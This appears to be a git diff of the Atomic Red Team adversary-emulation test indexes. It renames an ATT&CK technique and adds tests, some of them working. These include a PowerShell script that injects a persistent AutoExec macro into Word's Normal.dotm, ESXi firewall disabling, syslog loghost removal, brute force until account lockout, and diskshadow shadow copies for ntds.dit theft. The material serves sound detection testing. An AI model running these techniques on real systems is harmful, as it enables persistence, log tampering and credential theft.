[windows] @@ -1335,6 +1339,7 @@ - Atomic Test #1: Brute Force Credentials of single Active Directory domain users via SMB [windows] - Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows] - Atomic Test #4: Password Brute User using Kerbrute Tool [windows] + - Atomic Test #8: ESXi - Brute Force Until Account Lockout [windows] - [T1003 OS Credential Dumping](../../T1003/T1003.md) - Atomic Test #1: Gsecdump [windows] - Atomic Test #2: Credential Dumping with NPPSpy [windows] @@ -1487,6 +1492,7 @@ - Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows] - Atomic Test #7: Create Volume Shadow Copy with Powershell [windows] - Atomic Test #8: Create Symlink to Volume Shadow Copy [windows] + - Atomic Test #9: Create Volume Shadow Copy with diskshadow [windows] - [T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md) - Atomic Test #1: Request for service tickets [windows] - Atomic Test #2: Rubeus kerberoast [windows] diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md index 48e9480f86..82b50bff63 100644 --- a/atomics/Indexes/Matrices/matrix.md +++ b/atomics/Indexes/Matrices/matrix.md @@ -54,7 +54,7 @@ | | | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | Cloud Secrets Management Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | | | | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | [OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md) | | | | | | | | | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [Reflective Code Loading](../../T1620/T1620.md) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) | | | | | | | -| | | Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) | | | | | | | +| | | [Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) | | | | | | | | | | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | | | | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | [Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md) | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | | | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | [Impair Defenses: Disable Windows Event Logging](../../T1562.002/T1562.002.md) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md index 1f2b376a9e..0c7025e1a6 100644 --- a/atomics/Indexes/Matrices/windows-matrix.md +++ b/atomics/Indexes/Matrices/windows-matrix.md @@ -41,7 +41,7 @@ | | | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [Process Injection](../../T1055/T1055.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) | | | | | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Time Discovery](../../T1124/T1124.md) | | | | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | [Forced Authentication](../../T1187/T1187.md) | | | | | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | -| | | Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | +| | | [Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | | | | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | [Reflective Code Loading](../../T1620/T1620.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | | | | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) | | | | | | | | | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) | | | | | | | diff --git a/atomics/Indexes/azure-ad-index.yaml b/atomics/Indexes/azure-ad-index.yaml index d19354c6dd..02453c6916 100644 --- a/atomics/Indexes/azure-ad-index.yaml +++ b/atomics/Indexes/azure-ad-index.yaml @@ -30176,7 +30176,7 @@ persistence: description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence. Retrieved February 5, 2019. modified: '2021-08-16T21:27:10.873Z' - name: Office Template Macros + name: 'Office Application Startup: Office Template Macros.' description: "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates @@ -30228,6 +30228,7 @@ persistence: x_mitre_permissions_required: - User - Administrator + identifier: T1137.001 atomic_tests: [] T1546.009: technique: diff --git a/atomics/Indexes/containers-index.yaml b/atomics/Indexes/containers-index.yaml index c1b78023fc..f951d529ac 100644 --- a/atomics/Indexes/containers-index.yaml +++ b/atomics/Indexes/containers-index.yaml @@ -29916,7 +29916,7 @@ persistence: description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence. Retrieved February 5, 2019. modified: '2021-08-16T21:27:10.873Z' - name: Office Template Macros + name: 'Office Application Startup: Office Template Macros.' description: "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates @@ -29968,6 +29968,7 @@ persistence: x_mitre_permissions_required: - User - Administrator + identifier: T1137.001 atomic_tests: [] T1546.009: technique: diff --git a/atomics/Indexes/google-workspace-index.yaml b/atomics/Indexes/google-workspace-index.yaml index 22be6495b4..2018a18a03 100644 --- a/atomics/Indexes/google-workspace-index.yaml +++ b/atomics/Indexes/google-workspace-index.yaml @@ -29478,7 +29478,7 @@ persistence: description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence. Retrieved February 5, 2019. modified: '2021-08-16T21:27:10.873Z' - name: Office Template Macros + name: 'Office Application Startup: Office Template Macros.' description: "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates @@ -29530,6 +29530,7 @@ persistence: x_mitre_permissions_required: - User - Administrator + identifier: T1137.001 atomic_tests: [] T1546.009: technique: diff --git a/atomics/Indexes/iaas-index.yaml b/atomics/Indexes/iaas-index.yaml index 8691b2b794..0c2af3ad72 100644 --- a/atomics/Indexes/iaas-index.yaml +++ b/atomics/Indexes/iaas-index.yaml @@ -29362,7 +29362,7 @@ persistence: description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence. Retrieved February 5, 2019. modified: '2021-08-16T21:27:10.873Z' - name: Office Template Macros + name: 'Office Application Startup: Office Template Macros.' description: "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates @@ -29414,6 +29414,7 @@ persistence: x_mitre_permissions_required: - User - Administrator + identifier: T1137.001 atomic_tests: [] T1546.009: technique: diff --git a/atomics/Indexes/iaas_aws-index.yaml b/atomics/Indexes/iaas_aws-index.yaml index 03306273e8..9b1221e854 100644 --- a/atomics/Indexes/iaas_aws-index.yaml +++ b/atomics/Indexes/iaas_aws-index.yaml @@ -29733,7 +29733,7 @@ persistence: description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence. Retrieved February 5, 2019. modified: '2021-08-16T21:27:10.873Z' - name: Office Template Macros + name: 'Office Application Startup: Office Template Macros.' description: "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates @@ -29785,6 +29785,7 @@ persistence: x_mitre_permissions_required: - User - Administrator + identifier: T1137.001 atomic_tests: [] T1546.009: technique: diff --git a/atomics/Indexes/iaas_azure-index.yaml b/atomics/Indexes/iaas_azure-index.yaml index 2f3a98981d..a401d979ac 100644 --- a/atomics/Indexes/iaas_azure-index.yaml +++ b/atomics/Indexes/iaas_azure-index.yaml @@ -29757,7 +29757,7 @@ persistence: description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence. Retrieved February 5, 2019. modified: '2021-08-16T21:27:10.873Z' - name: Office Template Macros + name: 'Office Application Startup: Office Template Macros.' description: "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates @@ -29809,6 +29809,7 @@ persistence: x_mitre_permissions_required: - User - Administrator + identifier: T1137.001 atomic_tests: [] T1546.009: technique: diff --git a/atomics/Indexes/iaas_gcp-index.yaml b/atomics/Indexes/iaas_gcp-index.yaml index 4a5726e3a7..cd14bb76a3 100644 --- a/atomics/Indexes/iaas_gcp-index.yaml +++ b/atomics/Indexes/iaas_gcp-index.yaml @@ -29711,7 +29711,7 @@ persistence: description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence. Retrieved February 5, 2019. modified: '2021-08-16T21:27:10.873Z' - name: Office Template Macros + name: 'Office Application Startup: Office Template Macros.' description: "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates @@ -29763,6 +29763,7 @@ persistence: x_mitre_permissions_required: - User - Administrator + identifier: T1137.001 atomic_tests: [] T1546.009: technique: diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index af1bd369c2..3a56c2eddf 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -684,6 +684,35 @@ defense-evasion: copy #{exe_to_launch} not_an_scr.scr rundll32.exe desk.cpl,InstallScreenSaver not_an_scr.scr cleanup_command: del not_an_scr.scr + - name: Running DLL with .init extension and function + auto_generated_guid: 2d5029f0-ae20-446f-8811-e7511b58e8b6 + description: | + This test, based on common Gamarue tradecraft, consists of a DLL file with a .init extension being run by rundll32.exe. When this DLL file's 'krnl' function is called, it launches a Windows pop-up. + DLL created with the AtomicTestHarnesses Portable Executable Builder script. + supported_platforms: + - windows + input_arguments: + dll_file: + description: The DLL file to be called + type: string + default: PathToAtomicsFolder\T1218.011\bin\_WT.init + dll_url: + description: The URL to the DLL file that must be downloaded + type: url + default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/bin/_WT.init + dependency_executor_name: powershell + dependencies: + - description: The DLL file to be called must exist at the specified location + (#{dll_file}) + prereq_command: if (Test-Path "#{dll_file}") {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory (split-path "#{dll_file}") -ErrorAction ignore | Out-Null + Invoke-WebRequest "#{dll_url}" -OutFile "#{dll_file}" + executor: + command: 'rundll32.exe #{dll_file},krnl + + ' + name: command_prompt T1027.009: technique: modified: '2023-09-29T21:14:57.263Z' @@ -11130,6 +11159,48 @@ defense-evasion: ' name: command_prompt elevation_required: true + - name: ESXi - Disable Firewall via Esxcli + auto_generated_guid: bac8a340-be64-4491-a0cc-0985cb227f5a + description: 'Adversaries may disable the ESXI firewall via ESXCLI + + ' + supported_platforms: + - windows + input_arguments: + vm_host: + description: Specify the host name of the ESXi Server + type: string + default: atomic.local + plink_file: + description: Path to Putty + type: path + default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe + username: + description: username used to log into ESXi + type: string + default: root + password: + description: password used to log into ESXI + type: string + default: n/a + dependency_executor_name: powershell + dependencies: + - description: 'The plink executable must be found in the ExternalPayloads folder. + + ' + prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1} + + ' + get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" + executor: + command: "#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m + PathToAtomicsFolder\\..\\atomics\\T1562.004\\src\\esxi_disable_firewall.txt\n" + cleanup_command: "#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} + -m PathToAtomicsFolder\\..\\atomics\\T1562.004\\src\\esxi_enable_firewall.txt\n" + name: command_prompt + elevation_required: false T1553.003: technique: x_mitre_platforms: @@ -60750,7 +60821,7 @@ persistence: description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence. Retrieved February 5, 2019. modified: '2021-08-16T21:27:10.873Z' - name: Office Template Macros + name: 'Office Application Startup: Office Template Macros.' description: "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates @@ -60802,7 +60873,104 @@ persistence: x_mitre_permissions_required: - User - Administrator - atomic_tests: [] + identifier: T1137.001 + atomic_tests: + - name: Injecting a Macro into the Word Normal.dotm Template for Persistence via + PowerShell + auto_generated_guid: 940db09e-80b6-4dd0-8d4d-7764f89b47a8 + description: 'Injects a Macro in the Word default template "Normal.dotm" and + makes it execute each time that Word is opened. In this test, the Macro creates + a sheduled task to open Calc.exe every evening. + + ' + supported_platforms: + - windows + dependencies: + - description: 'Microsoft Word must be installed + + ' + prereq_command: | + try { + New-Object -COMObject "Word.Application" | Out-Null + Stop-Process -Name "winword" + exit 0 + } catch { exit 1 } + get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually + to meet this requirement" + + ' + executor: + name: powershell + elevation_required: true + command: "# Registry setting to \"Trust access to the VBA project object model\" + in Word\n$registryKey = \"HKCU:Software\\Microsoft\\Office\\16.0\\Word\\Security\"\n$registryValue + = \"AccessVBOM\"\n$registryData = \"1\"\n# The path where a flag text file + will be created if Registry setting did not already exist or if it was set + to 0\n$flagPath1 = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag1.txt\"\n$flagPath2 + = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag2.txt\"\n# + Get the value of the Key/Value pair\n$value = (Get-ItemProperty -Path $registryKey + -Name $registryValue -ErrorAction SilentlyContinue).$registryValue\n# Logical + operation to: if the value of the key/value is 1, do nothing - \n# if the + value is 0, change it to 1 and create flag1 - \n# if it doesn't exist, create + the value and flag2\nif ($value -eq \"1\") \n{\n Write-Host \"The registry + value '$registryValue' already exists with the required setting.\"\n} \n + \ elseif ($value -eq \"0\") \n{\n Write-Host \"The registry value was set + to 0, temporarily changing to 1.\"\n New-ItemProperty -Path $registryKey + -Name $registryValue -Value $registryData -PropertyType DWORD -Force | Out-Null\n + \ echo \"flag1\" > $flagPath1\n} \n else \n{\n Write-Host \"The registry + value '$registryValue' does not exist, temporarily creating it.\"\n New-ItemProperty + -Path $registryKey -Name $registryValue -Value $registryData -PropertyType + DWORD -Force | Out-Null\n echo \"flag2\" > $flagPath2\n}\nAdd-Type -AssemblyName + Microsoft.Office.Interop.Word\n# Define the path of copied normal template + for restoral\n$copyPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal1.dotm\"\n# + Define the path to the normal template\n$docPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\"\n# + Create copy of orginal template for restoral\nCopy-Item -Path $docPath -Destination + $copyPath -Force\n# VBA code to be insterted as a Macro\n# Will create a + scheduled task to open the Calculator at 8:04pm daily\n$vbaCode = @\"\n + \ Sub AutoExec()\n Dim applicationPath As String\n Dim taskName As String\n + \ Dim runTime As String\n Dim schTasksCmd As String\n applicationPath + = \"C:\\Windows\\System32\\calc.exe\"\n taskName = \"OpenCalcTask\"\n runTime + = \"20:04\"\n schTasksCmd = \"schtasks /create /tn \"\"\" & taskName & + \"\"\" /tr \"\"\" & applicationPath & \"\"\" /sc daily /st \" & runTime + & \" /f\"\n Shell \"cmd.exe /c \" & schTasksCmd, vbNormalFocus\n End Sub\n\"@\n# + Create a new instance of Word.Application\n$word = New-Object -ComObject + Word.Application\n# Keep the Word application hidden\n$word.Visible = $false\n# + Open the document\n$document = $word.Documents.Open($docPath)\n# Access + the VBA project of the document\n$vbaProject = $document.VBProject\n# Add + a new module to the VBA project\n$newModule = $vbaProject.VBComponents.Add(1) + # 1 = vbext_ct_StdModule\n# Add the VBA code to the new module\n$newModule.CodeModule.AddFromString($vbaCode)\n# + Run the Macro\n$word.run(\"AutoExec\")\n# Save and close the document\n$document.SaveAs($docPath)\n$document.Close()\n# + Quit Word\n$word.Quit()\n# Release COM objects\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($document) + | Out-Null\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($word) + | Out-Null\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($vbaProject) + | Out-Null\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($newModule) + | Out-Null\n" + cleanup_command: "# Registry setting to \"Trust access to the VBA project + object model\" in Word\n$registryKey = \"HKCU:Software\\Microsoft\\Office\\16.0\\Word\\Security\"\n$registryValue + = \"AccessVBOM\"\n$registryData1 = \"1\"\n$registryData0 = \"0\"\n# Defines + the path each flag file created depending on the original registry state\n$flagPath1 + = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag1.txt\"\n$flagPath2 + = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag2.txt\"\n# + Define the path of copied normal template for restoral\n$copyPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal1.dotm\"\n# + Define the path to the normal template\n$docPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\"\n# + Delete the scheduled task created by the Macro\nschtasks /Delete /TN \"OpenCalcTask\" + /F | Out-Null\n#Restore the orginal template if the backup copy exists\nif + (Test-Path $copyPath)\n{\n #Delete the injected template\n Remove-Item + -Force $docPath -ErrorAction SilentlyContinue\n # Restore the original + template\n Rename-Item -Force -Path $copyPath -NewName $docPath -ErrorAction + SilentlyContinue\n Write-Host \"The original template has been restored\"\n}\n + \ else\n{\n Write-Host \"The original template is present\"\n}\n#Restore + the original state of the registry key\nif (Test-Path $flagPath1) \n{\n + \ # The value was originally 0, set back to 0\n New-ItemProperty -Path + $registryKey -Name $registryValue -Value $registryData0 -PropertyType DWORD + -Force | Out-Null\n Remove-Item -Force $flagPath1 -ErrorAction SilentlyContinue\n + \ Write-Host \"The original registry state has been restored\"\n} \n elseif + (Test-Path $flagPath2)\n{\n #The value did not previously exist, delete + the value\n Remove-ItemProperty -Path $registryKey -Name $registryValue + | Out-Null\n Remove-Item -Force $flagPath2 -ErrorAction SilentlyContinue + | Out-Null\n Write-Host \"The original registry state has been restored\"\n}\n + \ else \n{\n # The value was already 1, do nothing\n Write-Host \"The + value $registryValue already existed in $registryKey.\"\n}\n" T1546.009: technique: x_mitre_platforms: @@ -74546,6 +74714,65 @@ collection: cleanup_command: 'rm -rf #{input_folder}' name: bash elevation_required: false + - name: ESXi - Remove Syslog remote IP + auto_generated_guid: 36c62584-d360-41d6-886f-d194654be7c2 + description: 'An adversary may edit the syslog config to remove the loghost + in order to prevent or redirect logs being received by SIEM. + + ' + supported_platforms: + - windows + input_arguments: + vm_host: + description: Specify the host name of the ESXi Server + type: string + default: atomic.local + plink_file: + description: Path to Putty + type: path + default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe + username: + description: Username used to log into ESXi + type: string + default: root + password: + description: password used to log into ESXI + type: string + default: n/a + dependency_executor_name: powershell + dependencies: + - description: 'The plink executable must be found in the ExternalPayloads folder. + + ' + prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1} + + ' + get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" + executor: + command: "# Extract line with IP address from the syslog configuration output\n#{plink_file} + -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\\..\\atomics\\T1560.001\\src\\esxi_get_loghost.txt + | findstr /r \"[0-9]*\\.[0-9]*\\.[0-9]*\\.\" > c:\\temp\\loghost.txt\n\n# + Replace the IP with \"0\"\n#{plink_file} -ssh #{vm_host} -l #{username} + -pw #{password} -m PathToAtomicsFolder\\..\\atomics\\T1560.001\\src\\esxi_remove_loghost.txt\n\n# + Extract the IP from the line extracted from findstr\n$inputFilePath = \"c:\\temp\\loghost.txt\"\n$outputFilePath + = \"c:\\temp\\loghost_ip.txt\"\n\n$fileContent = Get-Content -Path $inputFilePath + -Raw\n\nif ([string]::IsNullOrWhiteSpace($fileContent)) {\n Write-Host + \"The content is $fileContent\"\n Write-Host \"The file is empty\"\n} + else {\n # Use a regular expression to extract IP addresses\n $ipAddresses + = [regex]::Matches($fileContent, '(udp|tcp):\\/\\/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.*').Value\n + \ \n $output = \"esxcli system syslog config set --loghost=\" + $ipAddresses\n\n + \ $output | Out-File -FilePath $outputFilePath -Encoding ascii\n \n + \ Write-Host \"IP addresses extracted and saved to $outputFilePath\"\n}\n" + cleanup_command: | + # Re-add the initially extracted IP + #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m c:\temp\loghost_ip.txt + + rm c:\temp\loghost_ip.txt + rm c:\temp\loghost.txt + name: powershell + elevation_required: true T1113: technique: modified: '2023-03-30T21:01:39.967Z' @@ -81852,6 +82079,46 @@ credential-access: cleanup_command: 'rmuser -y art ' + - name: ESXi - Brute Force Until Account Lockout + auto_generated_guid: ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5 + description: | + An adversary may attempt to brute force the password of privilleged account for privilege escalation. + In the process, the TA may lock the account, which can be used for detection. [Reference](https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/#:~:text=A%20ransomware%20group%20attacking%20large,internal%20systems%20after%20establishing%20a) + supported_platforms: + - windows + input_arguments: + vm_host: + description: Specify the host name of the ESXi Server + type: string + default: atomic.local + plink_file: + description: Path to Putty + type: path + default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe + lockout_threshold: + description: Specify the account lockout threshold configured on the ESXI + management server + type: string + default: '5' + dependency_executor_name: powershell + dependencies: + - description: 'The plink executable must be found in the ExternalPayloads folder. + + ' + prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1} + + ' + get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" + executor: + command: | + $lockout_threshold = [int]"#{lockout_threshold}" + for ($var = 1; $var -le $lockout_threshold; $var++) { + #{plink_file} -ssh "#{vm_host}" -l root -pw f0b443ae-9565-11ee-b9d1-0242ac120002 + } + name: powershell + elevation_required: false T1003: technique: x_mitre_platforms: @@ -90793,6 +91060,24 @@ credential-access: mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 name: command_prompt elevation_required: true + - name: Create Volume Shadow Copy with diskshadow + auto_generated_guid: b385996c-0e7d-4e27-95a4-aca046b119a7 + description: | + This test is intended to be run on a domain controller + An alternative to using vssadmin to create a Volume Shadow Copy for extracting ntds.dit + supported_platforms: + - windows + input_arguments: + filename: + description: Location of the script + type: Path + default: PathToAtomicsFolder\T1003.003\src\diskshadow.txt + executor: + command: | + mkdir c:\exfil + diskshadow.exe /s #{filename} + name: command_prompt + elevation_required: true T1558.003: technique: modified: '2023-03-30T21:01:46.538Z' diff --git a/atomics/Indexes/linux-index.yaml b/atomics/Indexes/linux-index.yaml index 31a40608d2..4c4cfa6662 100644 --- a/atomics/Indexes/linux-index.yaml +++ b/atomics/Indexes/linux-index.yaml @@ -35883,7 +35883,7 @@ persistence: description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence. Retrieved February 5, 2019. modified: '2021-08-16T21:27:10.873Z' - name: Office Template Macros + name: 'Office Application Startup: Office Template Macros.' description: "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates @@ -35935,6 +35935,7 @@ persistence: x_mitre_permissions_required: - User - Administrator + identifier: T1137.001 atomic_tests: [] T1546.009: technique: diff --git a/atomics/Indexes/macos-index.yaml b/atomics/Indexes/macos-index.yaml index 7f7e6726f9..7397327c24 100644 --- a/atomics/Indexes/macos-index.yaml +++ b/atomics/Indexes/macos-index.yaml @@ -32832,7 +32832,7 @@ persistence: description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence. Retrieved February 5, 2019. modified: '2021-08-16T21:27:10.873Z' - name: Office Template Macros + name: 'Office Application Startup: Office Template Macros.' description: "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates @@ -32884,6 +32884,7 @@ persistence: x_mitre_permissions_required: - User - Administrator + identifier: T1137.001 atomic_tests: [] T1546.009: technique: diff --git a/atomics/Indexes/office-365-index.yaml b/atomics/Indexes/office-365-index.yaml index 5b5c75a1bd..3df9b20a46 100644 --- a/atomics/Indexes/office-365-index.yaml +++ b/atomics/Indexes/office-365-index.yaml @@ -29543,7 +29543,7 @@ persistence: description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence. Retrieved February 5, 2019. modified: '2021-08-16T21:27:10.873Z' - name: Office Template Macros + name: 'Office Application Startup: Office Template Macros.' description: "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates @@ -29595,6 +29595,7 @@ persistence: x_mitre_permissions_required: - User - Administrator + identifier: T1137.001 atomic_tests: [] T1546.009: technique: diff --git a/atomics/Indexes/saas-index.yaml b/atomics/Indexes/saas-index.yaml index 8691b2b794..0c2af3ad72 100644 --- a/atomics/Indexes/saas-index.yaml +++ b/atomics/Indexes/saas-index.yaml @@ -29362,7 +29362,7 @@ persistence: description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence. Retrieved February 5, 